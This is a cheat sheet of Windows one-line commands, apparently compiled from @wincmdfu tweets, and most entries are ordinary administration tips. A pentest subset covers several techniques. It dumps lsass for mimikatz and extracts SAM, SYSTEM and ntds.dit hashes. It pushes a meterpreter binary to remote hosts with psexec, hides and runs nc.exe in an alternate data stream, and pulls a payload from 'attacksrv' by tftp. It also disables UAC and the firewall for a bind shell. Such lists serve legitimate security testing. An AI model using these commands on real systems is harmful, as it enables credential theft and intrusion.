Windows CLI gems. Tweets of @wincmdfu
Windows one line commands that make life easier, shortcuts and command line fu.
Table of Contents
- Get entires from IPv4 neighbor cache
- Get available wireless networks via cmd and netsh
- Quick list IP addresses only
- List ALL services AND their binaries
- Export SAM from the Windows Registry to a file
- Enable remote desktop using reg
- Enable the boot log to see list of drivers loaded during startup
- Powershell cmdlet to create System Restore Point
- Check the current account for seDebugPrivilege
- Enable/disable system users via command line
- View process that is consuming the most memory using powershell
- Create an Alternate Data Stream from a file on an NTFS partition
- Export running processes in CSV format
- Lock Windows desktop using command line
- Start explorer with a file or folder selected/highlighted
- Dump VirtualBox image containing RAM and ELF headers
- Set Time Zone of the system clock
- Make folder inside a guest from the host
- Force copy meterpreter binary to remote machines & run as system
- Create n/w share called
Apps, with read access & limit to 10 conns - List all the drives under My Computer using fsutil
- Troubleshoot n/w packet drops with router statistics using pathping
- List unsigned dlls for a specific process. For system wide list
- Obtain a list of Windows XP computers on the domain using PS
- Open the System Properties window, with the
Advancedtab selected - Using the
dircommand to find Alternate Data Streams - Use
procdumpto obtain thelsassprocess memory - Run
mimikatzinminidumpmode & usemini.dmpfromprocdump - Get list of startup programs using wmic
- Add a binary to an Alternate Data Stream
- Execute a binary Alternate Data Stream Win 7/2008 using wmic
- Show config & state info for Network Access Protection enabled client
- Get computer system information, including domain name and memory, using wmic
- Use the Package Manager in Windows to install the Telnet client on Windows Vista & higher
- Secure delete a file/folder in Windows
- Show all startup entries while hiding Microsoft entries. CSV output
- Download files via commandline using PS
- Fetch the last 10 entries from the Windows Security event log, in text format
- Create a dll that runs calc on invoke
- Run a command as another user
- Get shutdown/reboot events from the last 1000 log entries using PS
- Create a new snapshot of the volume that has the AD database and log files
- Mount the snapshot
- Run a process on a remote system using wmic
- List the machines, with usernames, that were connected via RDP
- List all process that are running on your system by remote users connected via RDP
- Reset the Windows TCP\IP stack
- List logged on users
- Set a static IP on a remote box
- Bypass powershell execution policy restrictions
- List running processes every second on a remote box
- Get a list of running processes and their command line arguments on a remote system
- Remotely enable and start the Volume Shadow Copy Service
- Ping multiple IPs from
ips.txt& see live hosts - Set global proxy in Windows to point to IE proxy
- Enumerate list of drivers with complete path information
- View Group Policy Objects that have been applied to a system
- Reset the WMI repository to what it was when the OS was installed
- Create symbolic links in Windows Vista, 7 & higher
- Enable the tftp client in Vista & higher
- Obtain list of firewall rules on a local system
- Get name of current domain controller
- Look at content cached in kernel mode on IIS 7 and higher
- Quick test to check
MS15_034 - Get a list of all open Named pipes via Powershell
- Possible
VENOMdetection on VirtualBox - List RDP sessions on local or remote in list format
- Get a list of service packs & hotfixes using wmic for remote systems listed in file
- Export wireless connection profiles
- Unzip using PowerShell
- Open the Network & Sharing center
- Remotely stop/start ftp on several systems
- To quickly find large files using cmd
- Print RDP connections
- List scheduled tasks & binaries
- Display the "Stored User names and Passwords" window
- List namespaces & classes in WMI via PowerShell
- Convert Between VDI, VMDK, VHD, RAW disk images using VirtualBox
- Change file extensions recurseively
- List IPs of running VirtualBox machines
- Windows Privilege Escalation
- Enumerate packages with their oem inf filenames
- Install a driver package using inf file
- Malware Hunting with Mark Russinovich and the Sysinternals
- Windows Nano Server APIs
- Windows wifi hotspot using cmd
- Disable UAC via cmdline
- Turn off Windows firewall for all profiles
- List Missing Updates
- Export SAM and SYSTEM. Dump password hashes offline
- Convert Binary to base64 string to transfer across restricted RDP
- Convert Base64 string to Binary
- List services running as SYSTEM and possibly weak file permissions
- Check Bitlocker status on a remote box
- Export failed logon attempts
- Alternate Data Streams and PS
- Run the Windows Assessment tool for cpu and ram and disk
- Port forward (proxy) traffic to remote host and port
- Enable/Disable NetBIOS over TCP/IP
- Compact multiple VDI files across folders
- Full scan using WinDefender
- Generate 32 char random password
Get entires from IPv4 neighbor cache
C:\>netsh interface ipv4 show neighbors
Get available wireless networks via cmd and netsh
C:\>netsh wlan show networks mode=b
Quick list IP addresses only
Save the following in ip.bat in %PATH%
C:\>ipconfig | find /I "pv"
Call ip from CLI
List ALL services AND their binaries
for /F "tokens=2* delims= " %i in ('sc query ^| find /I "ce_name"') do @sc qc %i %j
Export SAM from the Windows Registry to a file
C:\>reg save HKLM\SAM "%temp%\SAM.reg"
Enable remote desktop using reg
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
Enable the boot log to see list of drivers loaded during startup
bcdedit /set bootlog yes
Read via %windir%\ntbtlog.txt
Powershell cmdlet to create System Restore Point
PS C:\>Checkpoint-Computer -description "Restore point!"
Check the current account for seDebugPrivilege
C:\> whoami /priv | findstr "Debug"
For all privs:
C:\> whoami /priv
Enable/disable system users via command line
C:\>net user test /active:yes (no)
Get full help on the net user command:
C:\>net help user
View process that is consuming the most memory using powershell
PS C:\> (Get-Process | Sort-Object -Descending WS)[0]
Create an Alternate Data Stream from a file on an NTFS partition
C:\>type data.txt > C:\windows\explorer.exe:newads.txt
Export running processes in CSV format
C:\> tasklist /FO CSV > tasks.txt
Lock Windows desktop using command line
C:\> rundll32 user32.dll,LockWorkStation
Start explorer with a file or folder selected/highlighted
C:\> explorer /select,C:\MyData\sample.docx
Dump VirtualBox image containing RAM and ELF headers
C:\>vboxmanage debugvm "WinXPLab1" dumpguestcore --filename winxplab1.elf
Set Time Zone of the system clock
C:\> tzutil /s "Eastern Standard Time"
List available Time zones:
C:\> tzutil /l
Make folder inside a guest from the host
VirtualBox
C:\> vboxmanage guestcontrol "WinXP" md "C:\\test" --username "user" --password "pass"
Force copy meterpreter binary to remote machines & run as system
C:\> psexec @$ips.txt -s -u adminuser -p pass -f -c \exploits\mp.exe
Create n/w share called Apps, with read access & limit to 10 conns
C:\> net share Apps=C:\Apps /G:everyone,READ /US:10
List all the drives under My Computer using fsutil
C:\> fsutil.exe fsinfo drives
Troubleshoot n/w packet drops with router statistics using pathping
C:\> pathping -n www.google.com
List unsigned dlls for a specific process.
For system wide list, remove the process name
C:\> listdlls -u explorer.exe
Obtain a list of Windows XP computers on the domain using PS
Server2008
PS C:\> Get-ADComputer -filter {OperatingSystem -like "*XP*"}
Open the System Properties window, with the Advanced tab selected
Change the number for different tabs
C:\> control sysdm.cpl,,3
Using the dir command to find Alternate Data Streams
C:\> dir /R | find ":$D"
Using streams sysinternals (shows path):
C:\> streams -s .
Use procdump to obtain the lsass process memory.
Use mimikatz minidump to get passwords
C:\> procdump -accepteula -ma lsass.exe mini.dmp
Run mimikatz in minidump mode & use mini.dmp from procdump
mimikatz # sekurlsa::minidump mini.dmp
mimikatz # sekurlsa::logonPasswords
Get list of startup programs using wmic
C:\> wmic startup list full
Add a binary to an Alternate Data Stream
C:\> type c:\tools\nc.exe > c:\nice.png:nc.exe
Execute it (XP/2K3):
C:\> start c:\nice.png:nc.exe
Execute a binary Alternate Data Stream Win 7/2008 using wmic
C:\> wmic process call create C:\nice.png:nc.exe
Show config & state info for Network Access Protection enabled client
https://technet.microsoft.com/en-us/library/cc730902(v=ws.10).aspx
C:\> netsh nap client show configuration
Get computer system information, including domain name and memory, using wmic
C:\> wmic computersystem list /format:csv
Use the Package Manager in Windows to install the Telnet client on Windows Vista & higher
C:\> pkgmgr /iu:"TelnetClient"
Secure delete a file/folder in Windows
Sysinternals
C:\> sdelete -p 10 a.txt
To recursively delete folders:
C:\> sdelete -10 -r C:\data\
Show all startup entries while hiding Microsoft entries. CSV output
It covers more locations than Windows inbuilt tools
C:\> autorunsc -m -c
Download files via commandline using PS
PS C:\> ipmo BitsTransfer;Start-BitsTransfer -Source http://foo/nc.exe -Destination C:\Windows\Temp\
Fetch the last 10 entries from the Windows Security event log, in text format
C:\> wevtutil qe Security /c:10 /f:Text
def is XML
Create a dll that runs calc on invoke
msfpayload windows/exec cmd=calc.exe R | msfencode -t dll -o rcalc.dll
C:\> rundll32.exe rcalc.dll,1
Run a command as another user
You will be prompted for password
C:\> runas /noprofile /user:domain\username "mmc wf.msc"
Get shutdown/reboot events from the last 1000 log entries using PS
Get-EventLog -log system -n 1000 | Where {$_.eventid -eq '1074'} | fl -pr *
Create a new snapshot of the volume that has the AD database and log files
C:\> ntdsutil sn "ac i ntds" create quit quit
Mount the snapshot
Copy ntds.dit from snapshot & System hive from reg for pwd hashes
C:\> ntdsutil snapshot "list all" "mount 1" quit quit
Run a process on a remote system using wmic
C:\> wmic /node:ip process call create "net user dum dum /add"
List the machines, with usernames, that were connected via RDP
C:\> reg query "HKCU\Software\Microsoft\Terminal Server Client\Servers" /s
List all process that are running on your system by remote users connected via RDP
C:\> query process *
Reset the Windows TCP\IP stack
netsh int ip reset c:\tcpresetlog.txt
List logged on users.
Very useful during a pentest to look for domain admins
C:\> net session | find "\\"
Set a static IP on a remote box
C:\> wmic /node:remotebox nicconfig where Index=1 call EnableStatic ("192.168.1.4"), ("255.255.255.0")
Bypass powershell execution policy restrictions
PS C:\> powershell -ExecutionPolicy Bypass -Noninteractive -File .\lastboot.ps1
List running processes every second on a remote box
C:\> wmic /node:target process list brief /every:1
Remove /node:target for localhost
Get a list of running processes and their command line arguments on a remote system
C:\> wmic /node:target process get commandline, name
Remotely enable and start the Volume Shadow Copy Service
C:\> sc \\target config vss start= auto
C:\> sc \\target start vss
Ping multiple IPs from ips.txt & see live hosts
C:\>for /F %i in (ips.txt) do ping -n 1 %i | find "bytes="
Set global proxy in Windows to point to IE proxy
C:\> netsh winhttp import proxy source=ie
Enumerate list of drivers with complete path information
C:\> driverquery /FO list /v
View Group Policy Objects that have been applied to a system
Very useful during pentests
C:\> gpresult /z /h outputfile.html
Reset the WMI repository to what it was when the OS was installed
Very helpful if you have a corrupt repo
C:\> winmgmt /resetrepository
Create symbolic links in Windows Vista, 7 & higher
C:\> mklink <link> <target>
C:\> mklink D:\newlink.txt E:\thisexists.txt
Enable the tftp client in Vista & higher
C:\> ocsetup TFTP /quiet
Pull files to a compromised server:
C:\> tftp -i attacksrv get bin.exe
Obtain list of firewall rules on a local system
C:\> netsh advfi fi sh rule name=all
Can be combined with wmic for remote systems
Get name of current domain controller
C:\> set log
C:\> nltest /dcname:DOMAIN
Get list of all DCs:
C:\> nltest /dclist:DOMAIN
Look at content cached in kernel mode on IIS 7 and higher
C:\> netsh http sh ca
Useful when investigating the MS15-034 HTTP.sys vuln
Quick test to check MS15_034
C:\> curl -v -H "Range: bytes=234234-28768768" "http://host/a.png" -o a.png
HTTP 416 = Vulnerable
HTTP 20X = Not vulnerable
Get a list of all open Named pipes via Powershell
PS C:\> [http://System.IO.Directory ]::GetFiles("\\.\\pipe\\")
Possible VENOM detection on VirtualBox
C:\> vboxmanage list -l vms > a.txt
Search 'Storage' & 'Floppy'
List RDP sessions on local or remote in list format
PS C:\> qwinsta /server: | foreach {($_.trim() -replace "\s+",",")} | ConvertFrom-Csv
Get a list of service packs & hotfixes using wmic for remote systems listed in file
C:\> wmic /node:@file /output:out.txt qfe list full
Export wireless connection profiles
C:\> netsh wlan export profile
key=clear allows plain text passwords
Unzip using PowerShell
PS C:\> Add-Type -A System.IO.Compression.FileSystem;[IO.Compression.ZipFile]::ExtractToDirectory(src,dst)
Open the Network & Sharing center
control.exe /name Microsoft.NetworkandSharingCenter
Create a shortcut of this as ns in PATH for ease
Remotely stop/start ftp on several systems
C:\> wmic /node:@ips.txt /user:u /password:p process call create "net <start> msftpsvc"
To quickly find large files using cmd
C:\> forfiles /s /c "cmd /c if @fsize gtr 100000 echo @path @fsize bytes"
Run from the dir you want
Print RDP connections
for /f "delims=" %i in ('reg query "HKCU\Software\Microsoft\Terminal Server Client\Servers"') do reg query "%i"
List scheduled tasks & binaries
C:\> schtasks /query /fo LIST /v
Weak permissions can be exploited for localprivilege escalation
Display the "Stored User names and Passwords" window
C:\> rundll32 keymgr.dll,KRShowKeyMgr
List namespaces & classes in WMI via PowerShell
PS C:\> gwmi -n root -cl __Namespace | Select name
PS C:\> gwmi -n root\cimv2 -li
Convert Between VDI, VMDK, VHD, RAW disk images using VirtualBox
C:\> vboxmanage clonehd myvdi.vdi myvmdk.vmdk --format VMDK
Change file extensions recurseively
csv to xls for eg
C:\Projects> forfiles /S /M *.csv /C "cmd /c ren @file @fname.xls"
List IPs of running VirtualBox machines
for /F %i in ('VBoxManage list runningvms') do VBoxManage guestproperty enumerate %i | find "IP"
Windows Privilege Escalation
Enumerate packages with their oem inf filenames
C:\> pnputil -e
Install a driver package using inf file
C:\> pnputil -i -a path_to_inf
Malware Hunting with Mark Russinovich and the Sysinternals
Windows Nano Server APIs
https://msdn.microsoft.com/en-us/library/mt588480(v=vs.85).aspx
Windows wifi hotspot using cmd
Starting a wifi hotspot using Windows cmd with ssid name hotspotname and key password
Disable UAC via cmdline
C:\> reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system /v EnableLUA /t REG_DWORD /d 0 /f
Turn off Windows firewall for all profiles
Useful if you have a bind shell
C:\> netsh advfirewall set allprofiles state off
List Missing Updates
PS C:\> (New-Object -c Microsoft.Update.Session).CreateUpdateSearcher().Search("IsInstalled=0").Updates|Select Title
Export SAM and SYSTEM Dump password hashes offline
C:\>reg save HKLM\SAM SAM
C:\>reg save HKLM\SYSTEM SYSTEM
Convert Binary to base64 string to transfer across restricted RDP
PS C:\> [Convert]::ToBase64String((gc -Pa "a.exe" -En By))
Convert Base64 string to Binary
PS C:\> sc -Path "a.exe" -Val ([Convert]::FromBase64String((gc -Pa "b64.txt" ))) -En By
List services running as SYSTEM and possibly weak file permissions
wmic service where StartName="LocalSystem"|findstr /IV ":\WIN :\PROG"
Check Bitlocker status on a remote box
manage-bde -status -cn <box>
Use wmic /node:@ips.txt & process alias for multiple.
Export failed logon attempts
PS C:\> Get-EventLog -Log Security | ?{$_.EntryType -eq 'FailureAudit'} | epcsv log.csv
Alternate Data Streams and PS
- List all ADS for all files in current dir
PS C:\> gi * -s *
- Read ADS
PS C:\> gc <file> -s <ADSName>
- Create ADS using text input
PS C:\> sc <file> -s <ADSName>
- Delete ADS
PS C:\> ri <file> -s <ADSName>
Run the Windows Assessment tool for cpu and ram and disk
C:\> winsat cpuformal -v
C:\> winsat memformal -v
C:\> winsat diskformal -v
Port forward (proxy) traffic to remote host and port
C:\> netsh int p add v4tov4 <LPORT> <RHOST> [RPORT] [LHOST]
Enable/Disable NetBIOS over TCP/IP
Step 1. Get Index of Network Adapter:
C:\> wmic nicconfig get caption,index
Step 2. Use the index
C:\> wmic nicconfig where index=1 call SetTcpipNetbios 1
0-Def
1-En
2-Dis
Compact multiple VDI files across folders
C:\> for /F %i in ('dir /b /s *.vdi ^| find ".vdi"') do vboxmanage modifyhd --compact %i
Full scan using WinDefender
C:\>"%ProgramFiles%\Windows Defender\MpCmdRun.exe" -scan -scantype 2
Use #wmic /node:@ips process for multiple.
Generate 32 char random password
Save as genpass.ps1
PS C:\> ([char[]](38..126)|sort{Get-Random})[0..32] -join ''
Contribution
Please read the contribution guidelines if you want to contribute.